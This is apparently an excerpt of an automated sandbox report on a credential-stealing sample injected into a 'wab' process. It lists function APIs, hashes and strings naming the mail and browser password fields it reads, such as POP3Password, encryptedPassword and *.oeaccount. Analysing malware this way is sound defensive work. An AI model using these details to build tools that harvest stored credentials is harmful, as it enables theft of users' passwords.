                                                              control_flow_graph 414 40ba28-40ba3a 415 40ba87-40ba9b call 406c62 414->415 416 40ba3c-40ba52 call 407e20 _mbsicmp 414->416 438 40ba9d call 4107f1 415->438 439 40ba9d call 404734 415->439 440 40ba9d call 404785 415->440 441 40ba9d call 403c16 415->441 442 40ba9d call 410a9c 415->442 421 40ba54-40ba6d call 407e20 416->421 422 40ba7b-40ba85 416->422 428 40ba74 421->428 429 40ba6f-40ba72 421->429 422->415 422->416 423 40baa0-40bab3 call 407e30 430 40bab5-40bac1 423->430 431 40bafa-40bb09 SetCursor 423->431 432 40ba75-40ba76 call 40b5e5 428->432 429->432 433 40bac3-40bace 430->433 434 40bad8-40baf7 qsort 430->434 432->422 433->434 434->431 438->423 439->423 440->423 441->423 442->423
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Cursor_mbsicmpqsort
                                                              • String ID: /nosort$/sort
                                                              • API String ID: 882979914-1578091866
                                                              • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                              • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                              • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                              • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                              Function 00410DBB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                              • memset.MSVCRT ref: 00410E10
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                              • _mbscpy.MSVCRT ref: 00410E87
                                                                • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                              • API String ID: 889583718-2036018995
                                                              • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                              • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                              • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                              • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                              Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                              • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                              • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindLoadLockSizeof
                                                              • String ID:
                                                              • API String ID: 3473537107-0
                                                              • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                              • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                              • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                              • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                              Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004109F7
                                                                • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                                                              • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                              • memset.MSVCRT ref: 00410A32
                                                              • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                              • String ID:
                                                              • API String ID: 3143880245-0
                                                              • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                              • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                              • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                              • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                              Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@
                                                              • String ID:
                                                              • API String ID: 1033339047-0
                                                              • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                              • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                              • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                              • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                              Function 00406F30 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@mallocmemcpy
                                                              • String ID:
                                                              • API String ID: 3831604043-0
                                                              • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                              • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                              • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                              • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                              Function 00407088 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                              • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: CreateFontIndirect_mbscpymemset
                                                              • String ID: Arial
                                                              • API String ID: 3853255127-493054409
                                                              • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                              • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                              • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                              • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                              Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                              • _strcmpi.MSVCRT ref: 0040CEC3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: strlen$_strcmpimemset
                                                              • String ID: /stext
                                                              • API String ID: 520177685-3817206916
                                                              • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                              • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                              • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                              • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                              Function 0044B435 Relevance: 3.1, APIs: 2, Instructions: 56memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(?,00000078,00000004), ref: 0044B43E
                                                              • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000078,00000004), ref: 0044B452
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 7b0ab345f8b147095ec499268aed239778a4d345bd8648cab821ed5a180e1bce
                                                              • Instruction ID: ac13c79d7fe72252008cad2d8c7d399cb1c4cdb5f22be9a76d9ffffc69c753be
                                                              • Opcode Fuzzy Hash: 7b0ab345f8b147095ec499268aed239778a4d345bd8648cab821ed5a180e1bce
                                                              • Instruction Fuzzy Hash: 86F0A4011896907DFA2199B90C42BB75BCCCB27320B240B4BF690C7283D69DCA1693FA
                                                              Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                              • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProc
                                                              • String ID:
                                                              • API String ID: 145871493-0
                                                              • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                              • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                              • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                              • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                              Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile$StringWrite_itoamemset
                                                              • String ID:
                                                              • API String ID: 4165544737-0
                                                              • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                              • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                              • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                              • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                              Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                              • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                              • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                              • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                              Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                              • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                              • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                              • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                              Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                              • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                              • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                              • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                              Function 00410CF3 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: EnumNamesResource
                                                              • String ID:
                                                              • API String ID: 3334572018-0
                                                              • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                              • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                              • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                              • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                              Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: CloseFind
                                                              • String ID:
                                                              • API String ID: 1863332320-0
                                                              • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                              • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                              • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                              • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                              Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                              • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                              • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                              • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                              Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                              • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                              • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                              • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                                                              Non-executed Functions

                                                              Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString_mbscmpstrlen
                                                              • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                              • API String ID: 3963849919-1658304561
                                                              • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                              • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                              • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                              • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                              Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@??3@memcpymemset
                                                              • String ID: (yE$(yE$(yE
                                                              • API String ID: 1865533344-362086290
                                                              • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                              • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                              • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                              • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                              Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                              • memset.MSVCRT ref: 0040E5B8
                                                              • memset.MSVCRT ref: 0040E5CD
                                                              • _mbscpy.MSVCRT ref: 0040E634
                                                              • _mbscpy.MSVCRT ref: 0040E64A
                                                              • _mbscpy.MSVCRT ref: 0040E660
                                                              • _mbscpy.MSVCRT ref: 0040E676
                                                              • _mbscpy.MSVCRT ref: 0040E68C
                                                              • _mbscpy.MSVCRT ref: 0040E69F
                                                              • memset.MSVCRT ref: 0040E6B5
                                                              • memset.MSVCRT ref: 0040E6CC
                                                                • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                                                              • memset.MSVCRT ref: 0040E736
                                                              • memset.MSVCRT ref: 0040E74F
                                                              • sprintf.MSVCRT ref: 0040E76D
                                                              • sprintf.MSVCRT ref: 0040E788
                                                              • _strcmpi.MSVCRT ref: 0040E79E
                                                              • _strcmpi.MSVCRT ref: 0040E7B7
                                                              • _strcmpi.MSVCRT ref: 0040E7D3
                                                              • memset.MSVCRT ref: 0040E858
                                                              • sprintf.MSVCRT ref: 0040E873
                                                              • _strcmpi.MSVCRT ref: 0040E889
                                                              • _strcmpi.MSVCRT ref: 0040E8A5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                              • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                              • API String ID: 4171719235-3943159138
                                                              • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                              • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                              • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                              • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                              Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                              • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                              • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                              • GetWindowRect.USER32(?,?), ref: 00410487
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                              • GetDC.USER32 ref: 004104E2
                                                              • strlen.MSVCRT ref: 00410522
                                                              • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                              • ReleaseDC.USER32(?,?), ref: 00410580
                                                              • sprintf.MSVCRT ref: 00410640
                                                              • SetWindowTextA.USER32(?,?), ref: 00410654
                                                              • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                              • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                              • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                              • GetClientRect.USER32(?,?), ref: 004106DD
                                                              • GetWindowRect.USER32(?,?), ref: 004106E7
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                              • GetClientRect.USER32(?,?), ref: 00410737
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                              • String ID: %s:$EDIT$STATIC
                                                              • API String ID: 1703216249-3046471546
                                                              • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                              • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                              • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
